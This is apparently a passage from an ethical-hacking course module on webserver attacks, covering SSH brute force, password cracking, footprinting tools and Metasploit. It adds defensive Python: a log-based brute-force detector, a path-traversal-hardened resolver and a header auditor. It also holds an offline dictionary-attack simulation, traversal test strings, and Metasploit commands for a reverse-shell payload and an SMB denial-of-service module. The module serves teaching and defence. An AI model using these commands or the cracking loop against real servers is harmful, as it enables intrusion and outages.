Figure 12.10: HTTP Response Hijacking
SSH Brute Force Attack

The SSH protocol creates an encrypted tunnel between two hosts so that otherwise unencrypted traffic can cross an insecure network safely. To attack it, the attacker first scans the target for SSH servers and identifies possible weaknesses, then uses a brute force attack against the login, trying username and password combinations until a valid pair is found. Once the attacker holds SSH credentials, the same tunnel can be used to transmit malware and other exploits to victims on the internal network (the mail, web, application, and file servers in Figure 12.11) without being detected, because the traffic is encrypted.

Figure 12.11: SSH Brute Force Attack
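Brute-forcing a live SSH service is not something to demonstrate offline, but the attack leaves a clear trace in sshd's log, and that detection is. The following Python script is an added example, not the module's code: it parses OpenSSH "Failed password" and "Accepted" lines and flags any source address that produced a threshold of failures within a short window, also noting whether the same address logged in successfully afterwards, the case that matters most. The log lines are constructed for the example, the threshold and window are assumptions, and the year is supplied because syslog timestamps omit it.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd lines in the syslog format OpenSSH uses on Linux (not a real capture).
SAMPLE_LOG = """\
Oct 12 10:14:01 web01 sshd[2301]: Failed password for root from 203.0.113.45 port 51022 ssh2
Oct 12 10:14:02 web01 sshd[2301]: Failed password for root from 203.0.113.45 port 51023 ssh2
Oct 12 10:14:02 web01 sshd[2305]: Failed password for invalid user admin from 203.0.113.45 port 51024 ssh2
Oct 12 10:14:03 web01 sshd[2307]: Failed password for invalid user test from 203.0.113.45 port 51025 ssh2
Oct 12 10:14:04 web01 sshd[2309]: Failed password for invalid user guest from 203.0.113.45 port 51026 ssh2
Oct 12 10:14:05 web01 sshd[2311]: Accepted password for root from 203.0.113.45 port 51027 ssh2
Oct 12 10:20:11 web01 sshd[2402]: Failed password for alice from 198.51.100.7 port 40012 ssh2
Oct 12 10:20:40 web01 sshd[2404]: Accepted publickey for alice from 198.51.100.7 port 40013 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+"
)


def parse_line(line, year=2012):
    """Return (timestamp, result, user, ip) for an auth line, or None for other lines.
    The year is an assumption: syslog timestamps do not carry one."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]


def detect_bruteforce(log_text, threshold=5, window_seconds=60):
    """Return {ip: (failures_in_window, users_tried, succeeded_after)} for every
    source with >= threshold failed logins inside any window_seconds span.
    succeeded_after is True when that source later logged in successfully."""
    events = [e for e in (parse_line(l) for l in log_text.splitlines()) if e]
    failures, successes = defaultdict(list), defaultdict(list)
    for ts, result, user, ip in events:
        (failures if result == "Failed" else successes)[ip].append((ts, user))

    alerts = {}
    for ip, fails in failures.items():
        fails.sort()
        for i in range(len(fails)):
            # Grow the window from failure i until it exceeds window_seconds.
            j = i
            while j < len(fails) and (fails[j][0] - fails[i][0]).total_seconds() <= window_seconds:
                j += 1
            if j - i >= threshold:
                users = sorted({user for _, user in fails[i:j]})
                last_failure = fails[j - 1][0]
                succeeded = any(ts > last_failure for ts, _ in successes.get(ip, []))
                alerts[ip] = (j - i, users, succeeded)
                break
    return alerts


if __name__ == "__main__":
    for ip, (count, users, succeeded) in detect_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {count} failures, users {users}, login succeeded afterwards: {succeeded}")
```

The same logic applies to a real /var/log/auth.log or to `journalctl -u ssh` output; the guessed user names (root, admin, test, guest) are the defaults the password-cracking section below lists, which is what such scans typically try first. A source flagged with succeeded_after set to True warrants an incident response, not just a block.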
Man-in-the-Middle Attack

In a man-in-the-middle (MITM) attack, an intruder intercepts or modifies the messages exchanged between a user and a web server by eavesdropping on or inserting themselves into the connection. The attacker acts as a proxy, so that all communication between the user and the web server passes through the attacker, who can read or alter it. This exposes sensitive information such as online banking details, user names, passwords, and session IDs transferred to the web server. The attacker lures the victim into connecting through the attacker's host, for example by posing as a legitimate proxy; once the victim's traffic is routed that way, the attacker sniffs the communication and steals session IDs.

Figure 12.12: Man-in-the-Middle Attack. The user visits a website; the attacker sits between the user and the web server and sniffs the communication to steal session IDs.
Web Server Password Cracking

Many hacking attempts start with password cracking: once a password is obtained, the attacker logs in as a valid user and the web server accepts the session as legitimate. Attackers exploit weak, poorly chosen passwords; the most common passwords found are password, root, administrator, admin, demo, test, guest, qwerty, pet names, and the like. To obtain passwords, attackers use social engineering, spoofing, phishing, Trojan horses or viruses, wiretapping, keystroke logging, brute force attacks, dictionary attacks, and similar methods.

Attackers mainly target:

- Web form authentication
- SSH tunnels
- FTP servers
- SMTP servers
- Web shares
Web Server Password Cracking Techniques

Passwords may be cracked manually or with automated tools such as Cain & Abel, Brutus, and THC Hydra. Attackers use the following techniques:

- Guessing: The attacker, or an automated tool, simply guesses likely passwords. Most people choose passwords they can remember easily, such as their pets' names, loved ones' names, license plate numbers, dates of birth, or weak strings such as "qwerty", "password", or "admin", and that same predictability lets the attacker guess them.

- Dictionary attack: The attacker tries each entry in a predefined list of words and common passwords. It is much faster than brute force but fails when the password contains digits, special characters, or combinations that are not in the list.

- Brute force attack: The attacker tries every possible combination of characters, for example uppercase A to Z, lowercase a to z, and digits 0 to 9. It is practical only for short or simple passwords; for a long password mixing uppercase and lowercase letters, digits, and special characters, the search can take months or years, which makes it infeasible in practice.

- Hybrid attack: A hybrid attack works like a dictionary attack but appends numbers and symbols to each dictionary word, combining the speed of a word list with part of the brute force search space. Passwords such as "admin123" or "Password!" that defeat a plain dictionary attack fall quickly to it.
  • 35. Web Application Attacks

    Vulnerabilities in web applications running on a web server provide a broad attack path for web server compromise.

    Note: For complete coverage of web application attacks refer to Module 13: Hacking Web Applications.

    - Directory Traversal: Directory traversal is exploitation of HTTP through which attackers are able to access restricted directories and execute commands outside of the web server root directory by manipulating a URL.
    - Parameter/Form Tampering: This type of tampering attack manipulates the parameters exchanged between client and server in order to modify application data, such as user credentials and permissions, price and quantity of products, etc.
    - Cookie Tampering: Cookie tampering is the method of poisoning or tampering with the cookie of the client. Most of these attacks take place when the cookie is sent from the client side to the server. Persistent and non-persistent cookies can be modified using different tools.

  • 36. Web Application Attacks (continued)

    - Command Injection Attacks: Command injection is an attack method in which a hacker alters the content of the web page by using HTML code and by identifying form fields that lack valid constraints.
    - Buffer Overflow Attacks: Most web applications are designed to sustain some amount of data. If that amount is exceeded, the application may crash or exhibit some other vulnerable behavior. The attacker takes advantage of this and floods the application with too much data, which causes a buffer overflow.
    - Cross-Site Scripting (XSS) Attacks: Cross-site scripting is a method where an attacker injects HTML tags or scripts into a target website.
    - Denial-of-Service (DoS) Attack: A denial-of-service attack is intended to terminate the operations of a website or a server and make it unavailable to its intended users.
    - Unvalidated Input and File Injection Attacks: These attacks are carried out by supplying unvalidated input or by injecting files into a web application.
    - Cross-Site Request Forgery (CSRF) Attack: The user's web browser is made by a malicious web page to send requests to a website where various vulnerable actions not intended by the user are performed. This kind of attack is dangerous in the case of financial websites.
    - SQL Injection Attacks: SQL injection is a code injection technique that uses a security vulnerability of a database for attacks. The attacker injects malicious code into strings that are later passed to SQL Server for execution.
    - Session Hijacking: Session hijacking is an attack where the attacker exploits, steals, predicts, or negotiates the real valid web session control mechanism to access the authenticated parts of a web application.
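The directory traversal item above describes escaping the web server root by manipulating a URL. The following added example (not from the CEH module) shows a static-file path resolver in its weak form beside a hardened form that decodes repeatedly, normalises, and refuses any path that resolves outside the document root; the document root /var/www/html and the request paths are constructed for the demonstration.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

WEBROOT = "/var/www/html"  # constructed document root for the demonstration


def resolve_naive(webroot: str, url_path: str) -> str:
    """The weak pattern: decode once and glue the request path onto the web
    root. A request for /../../etc/passwd resolves to /var/etc/passwd."""
    return posixpath.normpath(posixpath.join(webroot, unquote(url_path).lstrip("/")))


def resolve_safe(webroot: str, url_path: str) -> Optional[str]:
    """Hardened resolver: decodes until the path stops changing (defeats
    double encoding such as %252e%252e), rejects NUL bytes, treats
    backslashes as separators, normalises away "." and ".." segments, and
    finally checks that the resolved path is still inside the web root.
    Returns None when the request must be refused (400 or 403)."""
    decoded = url_path
    for _ in range(3):              # bounded: %252e -> %2e -> "." then stable
        step = unquote(decoded)
        if step == decoded:
            break
        decoded = step
    if "\x00" in decoded:           # NUL-truncation tricks against C back ends
        return None
    decoded = decoded.replace("\\", "/")
    root = posixpath.normpath(webroot)
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    # Containment check on the normalised path, with a trailing separator so
    # that /var/www/html-private is not accepted as being under /var/www/html.
    # A production handler would also resolve symlinks (os.path.realpath)
    # before this check.
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


if __name__ == "__main__":
    for req in ("/index.html", "/../../etc/passwd", "/%252e%252e/etc/passwd"):
        print(f"{req:32} naive={resolve_naive(WEBROOT, req):28} "
              f"safe={resolve_safe(WEBROOT, req)}")
```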
  • 37. Module Flow

    So far we have discussed web server concepts and the various techniques attackers use to hack a web server. Attackers usually hack a web server by following a procedural method. Now we will discuss the attack methodology used by attackers to compromise web servers.

    - Webserver Concepts
    - Webserver Attacks
    - Attack Methodology
    - Webserver Attack Tools
    - Counter-measures
    - Patch Management
    - Webserver Security Tools
    - Webserver Pen Testing

    This section provides insight into the attack methodology and the tools that help at the various stages of hacking.
  • 38. Webserver Attack Methodology

    Hacking a web server is accomplished in various stages. At each stage the attacker tries to gather more information about loopholes and tries to gain unauthorized access to the web server. The stages of the web server attack methodology include:

    - Information Gathering: Every attacker tries to collect as much information as possible about the target web server. Once the information is gathered, he or she analyzes it in order to find the security lapses in the current mechanism of the web server.
    - Web Server Footprinting: The purpose of footprinting is to gather more information about the security aspects of a web server with the help of tools or footprinting techniques. The main purpose is to learn about its remote access capabilities, its ports and services, and the aspects of its security.
    - Mirroring Website: Website mirroring is a method of copying a website and its content onto another server for offline browsing.

  • 39. Webserver Attack Methodology (continued)

    - Vulnerability Scanning: Vulnerability scanning is a method of finding the various vulnerabilities and misconfigurations of a web server. It is done with the help of automated tools known as vulnerability scanners.
    - Session Hijacking: Session hijacking is possible once the current session of the client is identified. Complete control of the user session is taken over by the attacker by means of session hijacking.
    - Hacking Web Server Passwords: Attackers use various password cracking methods such as brute force attacks, hybrid attacks, dictionary attacks, etc. to crack web server passwords.
  • 40. Webserver Attack Methodology: Information Gathering

    Information gathering involves collecting information about the targeted company. Attackers use tools such as Whois, Traceroute, Active Whois, etc. and query the Whois databases to get details such as a domain name, an IP address, or an autonomous system number. (The slide shows WHOis.net output for ebay.com; see Figure 12.13.)

    Note: For complete coverage of information gathering techniques refer to Module 02: Footprinting and Reconnaissance.

    Before hacking, every attacker first collects all the required information, such as the versions and technologies used by the web server. Attackers search the Internet, newsgroups, bulletin boards, etc. for information about the company. Most of the attackers' time is spent in the information gathering phase alone; that is why information gathering is both an art and a science. Many tools can be used for information gathering or to get details such as a domain name, an IP address, or an autonomous system number. The tools include:

    - Whois
    - Traceroute
    - Active Whois
    - Nmap
    - Angry IP Scanner
    - Netcat
  • 41. Whois

    Source: http://www.whois.net

    Whois allows you to perform a domain whois search and a whois IP lookup, and to search the whois database for relevant information on domain registration and availability. This can provide insight into a domain's history and additional information. It can be used to see who owns a domain name, how many pages from a site are listed with Google, or even to search the Whois address listings for a website's owner.

    WHOIS information for ebay.com (queried from whois.verisign-grs.com, Whois Server Version 2.0):
      Domain Name: EBAY.COM
      Registrar: MARKMONITOR INC.
      Whois Server: whois.markmonitor.com
      Referral URL: http://www.markmonitor.com
      Name Server: SJC-DNS1.EBAYDNS.COM
      Name Server: SJC-DNS2.EBAYDNS.COM
      Name Server: SMF-DNS1.EBAYDNS.COM
      Name Server: SMF-DNS2.EBAYDNS.COM
      Status: clientDeleteProhibited
      Status: clientTransferProhibited
      Status: clientUpdateProhibited
      Status: serverDeleteProhibited
      Status: serverTransferProhibited
      Status: serverUpdateProhibited
      Updated Date: 15-sep-2010
      Creation Date: 04-aug-1995
      Expiration Date: 03-aug-2018

    FIGURE 12.13: WHOIS Information Gathering
  • 42. Webserver Attack Methodology: Webserver Footprinting

    Gather valuable system-level information such as account details, operating system, software versions, server names, and database schema details.

    The purpose of footprinting is to gather account details, operating system and other software versions, server names, database schema details, and as much information as possible about the security aspects of a target web server or network. The main purpose is to learn about its remote access capabilities, open ports and services, and the security mechanisms implemented. Telnet to a web server to footprint it and gather information such as server name, server type, operating system, applications running, etc. Examples of tools used for footprinting include ID Serve, httprecon, Netcraft, etc.

    Netcraft

    Source: http://toolbar.netcraft.com

    Netcraft is a tool used to determine the OSes in use by the target organization. It has already been discussed in detail in the Footprinting and Reconnaissance module.
  • 43. FIGURE 12.14: Webserver Footprinting (Netcraft "Search Web by Domain", 3rd August 2012: results for sites containing "microsoft", 252 sites found; columns Site, Site Report, First seen, Netblock, OS; for example www.microsoft.com, first seen August 1995, Microsoft Corp, Citrix NetScaler)
  • 44. Webserver Footprinting Tools

    (The slide shows httprecon 7.3 fingerprinting http://www.nytimes.com:80/ and ID Serve querying www.google.com; see Figures 12.15 and 12.16.)

    We have already discussed the Netcraft tool. In addition to Netcraft, two more tools allow you to perform web server footprinting: httprecon and ID Serve.

    httprecon

    Source: http://www.computec.ch

    httprecon is a tool for advanced web server fingerprinting. The httprecon project does research in the field of web server fingerprinting, also known as HTTP fingerprinting. The goal is the highly accurate identification of a given httpd implementation. This software aims to improve the ease and efficiency of this kind of enumeration.
  • 45. FIGURE 12.15: httprecon Screenshot (httprecon 7.3 against http://www.nytimes.com:80/, target identified as Sun ONE Web Server 6.1; the captured response begins "HTTP/1.1 200 OK" with "Server: Apache", "cache-control: no-cache", "pragma: no-cache" and Set-Cookie headers for ALT_ID and adxcs with Path=/ and Domain=.nytimes.com; the matchlist of 352 implementations is headed by Oracle Application Server 10g 10.1.2.2.0 (58 hits), Sun Java System Web Server 7.0 (57), Abyss 2.5.0.0 X1, Apache 2.0.52 and Apache 2.2.6 (56 each))

    ID Serve

    Source: http://www.grc.com

    ID Serve is a simple Internet server identification utility. ID Serve can almost always identify the make, model, and version of any website's server software. This information is usually sent in the preamble of replies to web queries, but it is not shown to the user. ID Serve can also connect to non-web servers to receive and report that server's greeting message, which generally reveals the server's make, model, version, and other potentially useful information. Simply by entering any IP address, ID Serve will attempt to determine the associated domain name.
  • 46. FIGURE 12.16: ID Serve (Internet Server Identification Utility v1.02, Personal Security Freeware by Steve Gibson, Copyright (c) 2003 by Gibson Research Corp.; a query of www.google.com returned "Server: gws", "Content-Length: 221", "X-XSS-Protection: 1; mode=block", "X-Frame-Options: SAMEORIGIN", "Connection: close"; the server identified itself as gws)
  • 47. Webserver Attack Methodology: Mirroring a Website

    Website mirroring is a method of copying a website and its content onto another server. By mirroring a website, a complete profile of the site's directory structure, file structure, external links, etc. is created. Once the mirror is created, search for comments and other items in the HTML source code to make footprinting activities more efficient. Tools used for web server mirroring include HTTrack, Webripper 2.0, WinWSD, WebCopier Pro, and BlackWidow.

    HTTrack

    Source: http://www.httrack.com

    HTTrack is an offline browser utility. It allows you to download a World Wide Web site from the Internet to a local directory, recursively building all directories and getting HTML, images, and other files from the server to your computer. HTTrack preserves the original site's relative link structure. Simply open a page of the "mirrored" website in your browser, and you can browse the site from link to link as if you were viewing it online.

  • 48. FIGURE 12.17: Mirroring a Website (HTTrack, "Site mirroring in progress [2/14 (+13), 327948 bytes] - [Test Project.whtt]": bytes saved 320.26KB, time 2min22s, transfer rate 0B/s (1.19MB/s), active connections 1, links scanned 2/14 (+13), files written 14, files updated 0, errors 0)
  • 49. Webserver Attack Methodology: Vulnerability Scanning

    Perform vulnerability scanning to identify weaknesses in a network and determine whether the system can be exploited. Use a vulnerability scanner such as HP WebInspect, Nessus, Zaproxy, etc. to find hosts, services, and vulnerabilities.

    Vulnerability scanning is a method of determining the various vulnerabilities and misconfigurations of a target web server or network. It is done with the help of automated tools known as vulnerability scanners. Vulnerability scanning determines the vulnerabilities that exist in the web server and its configuration, and thus helps to determine whether the web server is exploitable or not. Sniffing techniques are applied to the network traffic to find out active systems, network services, applications, and vulnerabilities present. Attackers also test the web server infrastructure for any misconfiguration, outdated content, and known vulnerabilities. Various tools such as HP WebInspect, Nessus, Paros proxy, etc. are used to find hosts, services, and vulnerabilities.

    Nessus

    Source: http://www.nessus.org

    Nessus is a security scanning tool that scans systems remotely and reports the vulnerabilities it detects before an attacker actually attacks and compromises them. Its five features include high-speed discovery, configuration auditing, asset profiling, sensitive data discovery, patch management integration, and vulnerability analysis of your security posture, with features that enhance usability, effectiveness, efficiency, and communication with all parts of your organization.

  • 50. FIGURE 12.18: Nessus Screenshot
  • 51. Webserver Attack Methodology: Session Hijacking

    Sniff valid session IDs to gain unauthorized access to the web server and snoop the data. Use tools such as Burp Suite, Hamster, Firesheep, etc. to automate session hijacking.

    Note: For complete coverage of session hijacking concepts and techniques refer to Module 11: Session Hijacking.

    Session hijacking is possible once the current session of the client is identified. Complete control of the user session can be taken over by the attacker once the user establishes authentication with the server. With the help of sequence number prediction tools, attackers perform session hijacking: after identifying the open session, the attacker predicts the sequence number of the next packet and sends data packets before the legitimate user sends the response with the correct sequence number. In addition to this technique, other session hijacking techniques such as session fixation, session sidejacking, cross-site scripting, etc. can be used to capture valid session cookies and IDs. Tools used for session hijacking include Burp Suite, Hamster, Firesheep, etc.

    Burp Suite

    Source: http://portswigger.net

    Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface through to finding and exploiting security vulnerabilities. The key components of Burp Suite include the proxy, scanner, intruder, repeater, and sequencer tools, etc.

  • 52. FIGURE 12.19: Burp Suite Screenshot (burp suite free edition v1.4.01, target site map containing http://economictimes.indiatimes.com and http://edition.cnn.com; a GET request to /.element/ssi/ads.iframes/ returned status 200, length 676, MIME type HTML; the context menu offers add item to scope, spider this branch, actively scan this branch, passively scan this branch, engagement tools [pro version only], compare site maps, expand branch, expand requested items, delete branch, copy URLs in this branch, copy links in this branch, and save selected items)
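The footprinting tools above (httprecon, ID Serve) read the server's own response headers, and the session hijacking discussion turns on capturing session cookies. As an added example, not from the CEH module or from any of the tools named, the following Python audits a raw HTTP response for the indicators a defender would want removed before an attacker reads them: version strings in the Server or X-Powered-By headers, session cookies issued without Secure, HttpOnly or SameSite, and missing browser-protection headers. The sample response is constructed in the shape of the httprecon output in Figure 12.15, with example.com substituted for the real host.

```python
import re
from typing import List, Tuple

# Constructed sample response (not a real capture), modelled on the httprecon
# and ID Serve output shown in the figures above.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Thu, 11 Oct 2012 09:34:37 GMT\r\n"
    "Server: Apache/2.2.6 (Unix) PHP/5.2.4\r\n"
    "X-Powered-By: PHP/5.2.4\r\n"
    "Set-Cookie: ALT_ID=0123456789abcdef; Expires=Fri, 11 Oct 2013 09:34:37 GMT;"
    " Path=/; Domain=.example.com\r\n"
    "Set-Cookie: SESSIONID=abc123; Path=/; Secure; HttpOnly; SameSite=Lax\r\n"
    "X-Frame-Options: SAMEORIGIN\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html>...</html>"
)

VERSION_RE = re.compile(r"\d+\.\d+")            # "2.2.6", "5.2.4", ...
LEAKY_HEADERS = ("x-powered-by", "x-aspnet-version", "x-aspnetmvc-version")
WANTED_HEADERS = ("strict-transport-security", "x-frame-options",
                  "x-content-type-options")
COOKIE_FLAGS = ("secure", "httponly", "samesite")


def parse_headers(raw: str) -> Tuple[str, List[Tuple[str, str]]]:
    """Split a raw response into its status line and an ordered list of
    (lower-cased name, value) pairs; the body after the blank line is ignored."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    pairs = []
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            pairs.append((name.strip().lower(), value.strip()))
    return lines[0], pairs


def audit_cookie(set_cookie: str) -> List[str]:
    """Report which of Secure / HttpOnly / SameSite a Set-Cookie value lacks.
    Attribute names are case-insensitive, so everything is lower-cased."""
    parts = [p.strip() for p in set_cookie.split(";")]
    name = parts[0].split("=", 1)[0]
    attrs = {p.split("=", 1)[0].lower() for p in parts[1:]}
    return [f"cookie {name} lacks {flag}" for flag in COOKIE_FLAGS if flag not in attrs]


def audit_response(raw: str) -> List[str]:
    """Return a list of findings: disclosed versions/platforms, weak session
    cookies, and missing protective headers. An empty list means clean."""
    _, headers = parse_headers(raw)
    present = {name for name, _ in headers}
    findings: List[str] = []
    for name, value in headers:
        if name == "server" and VERSION_RE.search(value):
            # e.g. Apache: ServerTokens Prod reduces this to "Apache"
            findings.append(f"server header discloses version: {value}")
        elif name in LEAKY_HEADERS:
            findings.append(f"{name} discloses platform: {value}")
        elif name == "set-cookie":
            findings.extend(audit_cookie(value))
    for name in WANTED_HEADERS:
        if name not in present:
            findings.append(f"missing {name}")
    return findings


if __name__ == "__main__":
    for finding in audit_response(SAMPLE_RESPONSE):
        print(finding)
```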
Webserver Attack Methodology: Hacking Web Passwords

Use password cracking techniques such as brute force attacks, dictionary attacks, and password guessing to crack web server passwords. Use tools such as Brutus, THC-Hydra, etc.

http://www.hoobie.net

One of the main tasks of any attacker is password hacking. By cracking an administrative password, the attacker gains control over the web server. Methods attackers use for password hacking include password guessing, dictionary attacks, brute force attacks, hybrid attacks, syllable attacks, precomputed hashes, rule-based attacks, distributed network attacks, rainbow table attacks, etc. Password cracking can also be performed with tools such as Brutus and THC-Hydra.
Brutus

Source: http://www.hoobie.net

Brutus is an online (remote) password cracking tool. Attackers use it to crack web passwords without the victim's knowledge. The features of Brutus are explained briefly on a following slide.
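As an added example (not code from the CEH module, Brutus or THC-Hydra), the following Python reproduces the mechanics of a Brutus-style HTTP Basic Auth dictionary attack in-process so that it runs offline. The BasicAuthServer class is a constructed stand-in for the target, the USERS and WORDS lists stand in for users.txt and words.txt, and the attempt count it reports is users times passwords, the same arithmetic behind the 6 users x 818 passwords = 4908 maximum attempts shown in the Brutus log. It also shows the account-lockout countermeasure that such tools run into.

```python
import base64
import hashlib
import hmac
import itertools

# Constructed example, not code from Brutus, THC-Hydra or the CEH module.
# The "server" is an in-process stand-in that checks an HTTP Basic
# Authorization header; the attacker side builds the same header Brutus
# sends with its HEAD requests and walks user list x word list.

_SALT = b"constructed-salt"   # constructed; a real store salts per user


def _h(pw):
    """Hash passwords so the stand-in stores no plaintext (PBKDF2-SHA256)."""
    return hashlib.pbkdf2_hmac("sha256", pw.encode(), _SALT, 10_000)


# Constructed credential store standing in for the target's accounts.
CREDENTIALS = {"admin": _h("academic"), "backup": _h("letmein"),
               "www": _h("correct horse")}


class BasicAuthServer:
    """Answers HEAD requests with a status code. Counts failures per user
    and refuses further attempts once lockout_after is reached."""

    def __init__(self, lockout_after=10**9):
        self.failures = {}
        self.lockout_after = lockout_after

    def head(self, authorization):
        if not authorization or not authorization.startswith("Basic "):
            return 401
        try:
            user, _, pw = base64.b64decode(authorization[6:]).decode().partition(":")
        except Exception:
            return 400
        if self.failures.get(user, 0) >= self.lockout_after:
            return 429
        stored = CREDENTIALS.get(user)
        candidate = _h(pw)   # always hash, so unknown users cost the same time
        if stored is not None and hmac.compare_digest(stored, candidate):
            return 200
        self.failures[user] = self.failures.get(user, 0) + 1
        return 401


def basic_header(user, pw):
    """Authorization header exactly as a Basic Auth client sends it."""
    return "Basic " + base64.b64encode(f"{user}:{pw}".encode()).decode()


def dictionary_attack(server, users, words):
    """Try every (user, word) pair, as Brutus does with a user file and a
    word list. Returns the hits and the number of attempts made."""
    found, attempts = [], 0
    for user, word in itertools.product(users, words):
        attempts += 1
        if server.head(basic_header(user, word)) == 200:
            found.append((user, word))
    return found, attempts


# Constructed lists standing in for users.txt / words.txt.
USERS = ["admin", "backup", "root", "test", "guest", "www"]
WORDS = ["password", "123456", "academic", "letmein", "admin", "qwerty"]
```

Against a server without lockout the loop recovers admin/academic and backup/letmein after exactly len(USERS) * len(WORDS) attempts; with lockout_after=2 the admin account is locked before the third word is reached and the attack returns nothing, which is why throttling and lockout are the first countermeasures against this class of tool.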
Figure 12.20: Brutus screenshot (Brutus AET2 with target 10.0.0.17, type HTTP (Basic Auth), port 80, method HEAD, user file users.txt and word list words.txt; the Positive Authentication Results pane lists admin/academic and a second hit for the backup user, and the log reports 6 users, 818 passwords and a maximum of 4908 authentication attempts, i.e. 6 x 818)
Module Flow

The tools intended for monitoring and managing a web server can also be used by attackers for malicious purposes. Attackers implement various methods to hack web servers, and attackers with minimal knowledge of hacking usually rely on ready-made tools for hacking web servers.

Webserver Concepts
Webserver Attacks
Webserver Attack Tools
Attack Methodology
Webserver Pen Testing
Patch Management
Webserver Security Tools
Counter-measures

This section lists and describes various web server attack tools.
Webserver Attack Tools: Metasploit

The Metasploit Framework is a penetration testing toolkit, exploit development platform, and research tool that includes hundreds of working remote exploits for a variety of platforms. It supports automated exploitation of web servers by abusing known vulnerabilities and leveraging weak passwords via Telnet, SSH, HTTP, and SNMP.

http://www.metasploit.com

Source: http://www.metasploit.com

The Metasploit framework makes discovering, exploiting, and sharing vulnerabilities quick and relatively painless. It enables users to identify, assess, and exploit vulnerable web applications. Using VPN pivoting, you can run the NeXpose vulnerability scanner through the compromised web server to discover an exploitable vulnerability in a database that hosts confidential customer data and employee information. Your team members can then leverage the data gained to conduct social engineering in the form of a targeted phishing campaign, opening up new attack vectors on the internal network, which are immediately visible to the entire team. Finally, you generate executive and audit reports based on the corporate template to enable your organization to mitigate the attacks and remain compliant with Sarbanes-Oxley, HIPAA, or PCI DSS. Note that VPN pivoting, NeXpose integration, team collaboration and report templates are features of the commercial Metasploit Pro edition, whose web console appears in the screenshot; the open-source framework provides the exploit, payload and auxiliary modules described on the following slides.
Metasploit enables teams of penetration testers to coordinate orchestrated attacks against target systems and lets team leads manage project access on a per-user basis. In addition, Metasploit includes customizable reporting. Metasploit enables you to:

• Complete penetration test assignments faster by automating repetitive tasks and leveraging multi-level attacks
• Assess the security of web applications, network and endpoint systems, as well as email users
• Emulate realistic network attacks based on the leading Metasploit framework with more than one million unique downloads in the past year
• Test with the world's largest public database of quality-assured exploits
• Tunnel any traffic through compromised targets to pivot deeper into the network
• Collaborate more effectively with team members in concerted network tests
• Customize the content and template of executive, audit, and technical reports

Figure 12.21: Metasploit screenshot (the Metasploit web console's overview page, showing Target System Status, Operating Systems (Top 5), Project Activity (24 Hours) and Network Services (Top 5), the last listing DCERPC, SMB and NetBIOS servers among others)
Metasploit Architecture

The Metasploit framework is an open-source exploitation framework designed to provide security researchers and pen testers with a uniform model for rapid development of exploits, payloads, encoders, NOP generators, and reconnaissance tools. The framework provides the ability to reuse large chunks of code that would otherwise have to be copied or reimplemented on a per-exploit basis. It was designed to be as modular as possible in order to encourage the reuse of code across projects.

The framework is broken down into a few different pieces, the lowest-level being the framework core. The framework core is responsible for implementing all of the required interfaces that allow for interacting with exploit modules, sessions, and plugins. Above the core sits the framework base, on which the user interfaces (msfconsole, msfcli, msfweb and others) are built; underneath all of them is Rex, the Ruby extension library that supplies the protocol tools, sockets and other low-level utilities. The framework supports vulnerability research, exploit development, and the creation of custom security tools.
Figure 12.22: Metasploit architecture (Libraries: Rex, Framework-Core, Framework-Base; Interfaces: msfconsole, msfcli, msfweb, msfwx, msfapi; Modules: Exploits, Payloads, Encoders, NOPS, Auxiliary; alongside Custom plug-ins, Protocol Tools, Security Tools and Web Services Integration)
Metasploit Exploit Module

The exploit module is the basic module in Metasploit used to encapsulate an exploit; because an exploit module carries a list of targets, users can hit many platforms or versions with a single exploit. This module comes with simplified meta-information fields. Using the Mixins feature, users can also modify exploit behavior dynamically, perform brute force attacks, and attempt passive exploits.

The steps to exploit a system using the Metasploit framework are:

1. Configuring an active exploit
2. Verifying the exploit options
3. Selecting a target
4. Selecting the payload
5. Launching the exploit
Metasploit Payload Module

The payload module establishes a communication channel between the Metasploit framework and the victim host. It carries the arbitrary code that is executed as a result of an exploit succeeding. To generate a payload, first select one with the use command and then run generate -h to list its options, as shown in Figure 12.23.

The Metasploit payload module offers shellcode that can perform a number of tasks for an attacker. A payload is a piece of software that lets you control a computer system after it has been exploited. The payload is typically attached to and delivered by the exploit: the exploit carries the payload in its backpack when it breaks into the system and then leaves the backpack there. With the help of a payload (Meterpreter, for example), you can upload and download files, take screenshots, and collect password hashes; you can even take over the screen, mouse, and keyboard to fully control the computer.

To generate payloads, first select a payload using the command:
Command Prompt

msf > use windows/shell_reverse_tcp
msf payload(shell_reverse_tcp) > generate -h
Usage: generate [options]

Generates a payload.

OPTIONS:

    -b <opt>  The list of characters to avoid: '\x00\xff'
    -e <opt>  The name of the encoder module to use.
    -h        Help banner.
    -o <opt>  A comma separated list of options in VAR=VAL format.
    -s <opt>  NOP sled length.
    -t <opt>  The output type: ruby, perl, c, or raw.

msf payload(shell_reverse_tcp) >

Figure 12.23: Metasploit Payload Module
Metasploit Auxiliary Module

Metasploit's auxiliary modules can be used to perform arbitrary, one-off actions such as port scanning, denial of service, and even fuzzing. To run an auxiliary module, use either the run command or the exploit command:

Command Prompt

msf > use dos/windows/smb/ms06_035_mailslot
msf auxiliary(ms06_035_mailslot) > set RHOST 1.2.3.4
RHOST => 1.2.3.4
msf auxiliary(ms06_035_mailslot) > run
[*] Mangling the kernel, two bytes at a time...
Metasploit NOPS Module

NOP modules generate no-operation instructions that are used for padding out buffers (a NOP sled in front of a payload gives the hijacked instruction pointer a wide region to land in). The NOP module console interface supports generating a NOP sled of an arbitrary size and displaying it in a given format with the generate command:

Usage: generate [options] length

Generates a NOP sled of a given length.

OPTIONS:

